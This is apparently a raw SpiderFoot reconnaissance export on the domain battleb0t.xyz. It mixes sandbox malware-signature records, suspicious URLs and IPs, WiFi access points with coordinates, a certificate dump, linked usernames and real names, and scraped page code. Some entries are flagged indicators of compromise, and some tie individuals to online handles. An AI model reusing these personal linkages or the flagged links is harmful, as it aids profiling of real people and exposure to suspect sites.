u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabCDC6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"9VHR8B4B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9VHR8B4B.txt]- [targetUID: 00000000-00001292]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002388]\n "IQO9YSQA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQO9YSQA.txt]- [targetUID: 00000000-00001292]\n "~DF08918F10D128602A.TMP" has type "data"- Location: [%TEMP%\\~DF08918F10D128602A.TMP]- [targetUID: 00000000-00001292]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001292]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001292]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001292]\n "~DFC9A238F73E498DE2.TMP" has type "data"- Location: [%TEMP%\\~DFC9A238F73E498DE2.TMP]- [targetUID: 00000000-00001292]\n "7OCETGYM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7OCETGYM.txt]- [targetUID: 00000000-00001292]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001292]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001292]\n "CabCDC6.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabCDC6.tmp]- [targetUID: 00000000-00002388]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002388]\n "103621DE9CD5414CC2538780B4B75751" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\103621DE9CD5414CC2538780B4B75751]- [targetUID: 00000000-00002388]\n "61DA5DFAF74A80490B74893AB3138953" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\61DA5DFAF74A80490B74893AB3138953]- [targetUID: 00000000-00002388]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001292]\n "~DF9ACEEE1176E79600.TMP" has type "data"- Location: [%TEMP%\\~DF9ACEEE1176E79600.TMP]- [targetUID: 00000000-00001292]\n "TarCDC7.tmp" has type "data"- Location: [%TEMP%\\TarCDC7.tmp]- [targetUID: 00000000-00002388]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://agretermco.com/?ud=PN6m0hZcGA8vvPdtJgFGz92gcS&e=8b2395da&h=a67b717b&f=y&p=n"- [Source: Input]\n Pattern match: "https://agretermco.com"- [Source: Input]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 7, u'description': u'TCP traffic to 34.74.170.74 on port 443 is sent without HTTP header'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: http://fantastic-croquembouche-4fbca6.netlify.app/ (AV positives: 5/88 scanned on 08/03/2022 15:39:24)\n URL: http://fanciful-torte-7830d3.netlify.app/?naps (AV positives: 3/88 scanned on 08/03/2022 14:54:22)\n URL: https://helpful-begonia-df9d89.netlify.app/?naps (AV positives: 6/89 scanned on 08/03/2022 13:53:18)\n URL: https://jolly-hotteok-091832.netlify.app/?naps (AV positives: 4/89 scanned on 08/03/2022 13:49:20)\n URL: https://wondrous-manatee-be49bf.netlify.app/?naps (AV positives: 6/8 | 34.74.170.74 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:33:68:60) | 39.0469, -77.4903 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BudgetScottsdale (Net ID: 00:09:5B:29:02:37) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SSR (Net ID: 00:01:E3:51:27:11) | 50.1188, 8.6843 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 90 CW @ 18} | https://pics.battleb0t.xyz/images/withat_4.jpg |
| 2023-05-12 03:10:06 | Malicious IP Address | Yes | VoIPBL OpenPBX IPs | 0 | 1 | 2 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.109.153]
http://www.voipbl.org/update | 185.199.109.153 |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi.battleb0t.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | david@14islands.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/form.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ie.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ajax.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/fx_methods.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/deferred.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/zepto.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/data.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/gesture.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/selector.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/madrobby/zepto/blob/master/src/ios3.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://zeptojs.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:304:WilStaging_02"\n "Local\\SM0:6976:120:WilError_01"\n "SM0:6976:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "138.91.254.96:443"\n "185.199.110.153:443"\n "104.21.16.28:443"\n "192.30.255.116:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"zeptojs.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.github.com"\n "ghbtns.com"\n "zeptojs.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<figure class="highlight"><pre><code class="language-js" data-lang="js"><span class="c1">// autolink everything that looks like a Twitter username</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")\n Found string "<span class="s1">\'$1@<a href="http://twitter.com/$2">$2</a>\'</span><span class="p">)</span>" (Indicator: "dir "; File: "urlref_httpzeptojs.com")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpzeptojs.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\shopping.js]- [targetUID: 00000000-00004044]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004072]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4044_1336506228\\edge_driver.js]- [targetUID: 00000000-00004044]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_driver.js]- [targetUID: 00000000-00004044]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004072]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004044]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\auto_open_controller.js]- [targetUID: 00000000-00004044]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004044]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004044]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4044_1336506228\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004044]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004044]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004044]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4044_143422276\\product_page.js]- [targetUID: 00000000-00004044]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004044]\n "load_statistics.db" has type "SQLite 3.x database |
| 2023-05-12 02:46:06 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3a:9c:49:d5:78:f8:ac:5a:ba:61:60:6a:4f:18:04:e8:71:47:
69:62:76:f2:cc:e1:7a:77:c4:76:2d:14:ad:8a:51:f0:c8:e8:
f9:38:53:48:90:b9:69:2e:c4:f1:18:37:86:86:25:90:2d:e5:
dd:87:c3:e4:30:76:38:c5:2d:b9:29:35:8f:95:4f:0a:47:25:
94:fe:7d:19:c2:82:cf:f4:d6:6f:2b:05:f9:ef:21:99:a0:d9:
36:83:ad:ba:2a:71:8c:ce:04:55:e9:a3:ae:0f:98:dd:33:3e:
45:9e:26:1e:62:2f:e5:b0:c1:a2:6e:6b:64:03:05:91:c5:ca:
50:6d:e8:c1:41:d8:07:0e:25:58:e8:76:72:9e:b3:02:79:6d:
1c:be:17:b1:a7:32:cd:3e:e0:3c:2c:87:d6:3f:c4:48:c0:a3:
08:59:a0:4e:0f:07:7f:61:15:d7:87:60:df:16:46:c9:31:1c:
35:61:49:d1:30:f6:df:8b:a1:f3:b4:55:7d:23:f2:7e:02:d1:
77:34:24:b1:27:08:2c:2f:5f:8e:75:03:e6:17:9c:33:bc:f3:
b6:45:1b:5b:14:7b:ab:6c:5f:cc:d8:bb:78:b2:59:03:74:72:
01:65:2e:6e:c2:e6:b0:7e:32:e9:3b:23:f0:2f:a8:b0:4a:66:
8f:c0:d5:69
| battleb0t.xyz |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 0 | 0 | 0 | 0 | None | Kekwltd | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Cocos Islands | rathook.cc |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | HPN (Net ID: 00:0C:41:76:71:40) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-fastly-request-id: 81f392d6f8601ba9f7017cc835b0845172eec1e9 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /*
MIT License
Copyright (c) 2017 Pavel Dobryakov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
'use strict';
// Mobile promo section
const promoPopup = document.getElementsByClassName('promo')[0];
const promoPopupClose = document.getElementsByClassName('promo-close')[0];
if (isMobile()) {
setTimeout(() => {
promoPopup.style.display = 'table';
}, 20000);
}
promoPopupClose.addEventListener('click', e => {
promoPopup.style.display = 'none';
});
const appleLink = document.getElementById('apple_link');
appleLink.addEventListener('click', e => {
ga('send', 'event', 'link promo', 'app');
window.open('https://apps.apple.com/us/app/fluid-simulation/id1443124993');
});
const googleLink = document.getElementById('google_link');
googleLink.addEventListener('click', e => {
ga('send', 'event', 'link promo', 'app');
window.open('https://play.google.com/store/apps/details?id=games.paveldogreat.fluidsimfree');
});
// Simulation section
const canvas = document.getElementsByTagName('canvas')[0];
resizeCanvas();
let config = {
SIM_RESOLUTION: 128,
DYE_RESOLUTION: 1024,
CAPTURE_RESOLUTION: 512,
DENSITY_DISSIPATION: 1,
VELOCITY_DISSIPATION: 0.2,
PRESSURE: 0.8,
PRESSURE_ITERATIONS: 20,
CURL: 30,
SPLAT_RADIUS: 0.25,
SPLAT_FORCE: 6000,
SHADING: true,
COLORFUL: true,
COLOR_UPDATE_SPEED: 10,
PAUSED: false,
BACK_COLOR: { r: 0, g: 0, b: 0 },
TRANSPARENT: false,
BLOOM: true,
BLOOM_ITERATIONS: 8,
BLOOM_RESOLUTION: 256,
BLOOM_INTENSITY: 0.8,
BLOOM_THRESHOLD: 0.6,
BLOOM_SOFT_KNEE: 0.7,
SUNRAYS: true,
SUNRAYS_RESOLUTION: 196,
SUNRAYS_WEIGHT: 1.0,
}
function pointerPrototype () {
this.id = -1;
this.texcoordX = 0;
this.texcoordY = 0;
this.prevTexcoordX = 0;
this.prevTexcoordY = 0;
this.deltaX = 0;
this.deltaY = 0;
this.down = false;
this.moved = false;
this.color = [30, 0, 300];
}
let pointers = [];
let splatStack = [];
pointers.push(new pointerPrototype());
const { gl, ext } = getWebGLContext(canvas);
if (isMobile()) {
config.DYE_RESOLUTION = 512;
}
if (!ext.supportLinearFiltering) {
config.DYE_RESOLUTION = 512;
config.SHADING = false;
config.BLOOM = false;
config.SUNRAYS = false;
}
startGUI();
function getWebGLContext (canvas) {
const params = { alpha: true, depth: false, stencil: false, antialias: false, preserveDrawingBuffer: false };
let gl = canvas.getContext('webgl2', params);
const isWebGL2 = !!gl;
if (!isWebGL2)
gl = canvas.getContext('webgl', params) || canvas.getContext('experimental-webgl', params);
let halfFloat;
let supportLinearFiltering;
if (isWebGL2) {
gl.getExtension('EXT_color_buffer_float');
supportLinearFiltering = gl.getExtension('OES_texture_float_linear');
} else {
halfFloat = gl.getExtension('OES_texture_half_float');
supportLinearFiltering = gl.getExtension('OES_texture_half_float_linear');
}
gl.clearColor(0.0, 0.0, 0.0, 1.0);
const halfFloatTexType = isWebGL2 ? gl.HALF_FLOAT : halfFloat.HALF_FLOAT_OES;
let formatRGBA;
let formatRG;
let formatR;
if (isWebGL2)
{
formatRGBA = getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RG16F, gl.RG, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.R16F, gl.RED, halfFloatTexType);
}
else
{
formatRGBA = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.RGBA, gl.RGBA, halfFloatTexType);
}
ga('send', 'event', isWebGL2 ? 'webgl2' : 'webgl', formatRGBA == null ? 'not supported' : 'supported');
return {
gl,
ext: {
formatRGBA,
formatRG,
formatR,
halfFloatTexType,
supportLinearFiltering
}
};
}
function getSupportedFormat (gl, internalFormat, format, type)
{
if (!supportRenderTextureFormat(gl, internalFormat, format, type))
{
switch (internalFormat)
{
case gl.R16F:
return getSupportedFormat(gl, gl.RG16F, gl.RG, type);
case gl.RG16F:
return getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, type);
default:
return null;
}
}
return {
internalFormat,
format
}
}
function supportRenderTextureFormat (gl, internalFormat, format, type) {
let texture = gl.createTexture();
